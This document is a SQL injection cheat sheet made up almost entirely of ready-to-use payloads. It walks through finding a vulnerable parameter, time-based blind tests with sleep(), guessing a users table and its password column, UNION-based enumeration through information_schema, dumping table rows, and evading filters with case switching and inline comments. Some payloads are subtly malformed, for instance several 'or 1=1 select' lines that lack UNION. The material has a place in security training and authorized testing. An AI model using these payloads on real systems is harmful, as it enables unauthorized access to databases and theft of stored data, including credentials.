Sql Injection
SQL-Injection-cheat-sheet
first try to figure out the vulnerable parameter
NOTE: If it’s a GET request don’t forget to url encode the characters.
param=' --> try to get error
param=" --> try to get error
param=' or 1=1 --> try if it works
param=' or 1=0 --> check if it returns nothing
param=' and 1=1 --> check if this works or produces error
Try with blind injection payloads if above commands does not produce error
' or sleep(2) and 1=1# --> try get delay, sleep only operates when all other conditions are true and there is a requirement to operate it.
' or sleep(2)# --> try get delay
admin' and sleep(2)# --> will delay only if the user admin exists
' union select sleep(2),null# --> check if it produces delay
' union select sleep(2),null,null,null,null# --> check if it produces delay, check for different number of columns
Try if above queries work by appending comment at the end
param=' or 1=1# --> try if it works
param=' or 1=1 -- one space needed --> try if it works
param=' or 1=1 // --> try if it works
param= or 1=1# --> try if it works
param=and or 1=1# --> try if it works
param=' or 1=1-- sd --> try if it works
' AND (select 1)=1 <-- This should be TRUE Response -- subselect supported
- Now that we know the vulnerable parameter, let’s try guessing the table name:
' AND (select 1 from admin limit 0,1)=1 <-- FALSE
' AND (select 1 from users limit 0,1)=1 <-- TRUE ======> Table found 'users'
- Guessing Columns:
' AND (select substring(concat(1,pass),1,1) from users limit 0,1)=1 <-- FALSE
' AND (select substring(concat(1,password),1,1) from users limit 0,1)=1 <-- TRUE =====> Column 'password' found.
- Now determine number of columns in the current table
param=' or 1=1 order by 1#
param=' or 1=1 order by 10#
let say there are 3 columns
- Now determine vulnerable columns or columns which are visible
param=' or 1=0 union select null,null,null# --> if it produces no error then try
param=' or 1=0 union select 1,2,3# --> check which number shows in web page
Else try
param=' or 1=1 union select table_name,null,null from information_schema.tables#
if it produces error try table_name at other positions
Now, lets say column 1,2 are shown in web page
- To futher enumerate
param=' or 1=0 union select table_schema,null,null from information_schema.columns# --> display all database name
Note 1=0 in above query to show only databases
param=' or 1=0 union select version(),null,null from information_schema.columns# --> retrieve version
param=' or 1=0 union select @@version,null,null from information_schema.columns# --> retrieve version in mssql
param=' or 1=0 union select substring(version(),1,1)=1,null,null from information_schema.columns# --> return true if version is 1.x.x
param=' or 1=0 union select substring(version(),1,1)=5,null,null from information_schema.columns# --> return true if version is 5.x.x
param=' or 1=0 union select substring(version(),3,1)=2,null,null from information_schema.columns# --> return true if version is 5.2.x
param=' or 1=0 union select table_name,null,null from information_schema.columns# --> display all table name
param=' or 1=1 select table_name,null,null from information_schema.columns where table_schema='public'# --> display tables inside public database
param=' or 1=1 select column_name,null,null from information_schema.columns where table_schema='public' and table_name='info'# --> display all columns of info table
param=' or 1=1 select table_name as table,column_name as column,null from information_schema.columns#
Let say the database name is public and table name is info with two columns in it id and name.
param=' or 1=0 union select id,null,null from public.info# --> display id column from table "info"
param=' or 1=0 union select id,name,null from public.info# --> display id and name column from table "info"
param=' or 1=0 union select id,name,null from public.info where id='papa'# --> display id and name of 'papa'
- BYPASSING filters
we can use case switching or commenting to bypass basic filters
param=' or 1=0 UniOn selEct id,null,null FroM public.info#
param=' or 1=0 un/**/ion sele/**/ct id,null,null fr/**/om public.info# works in mssql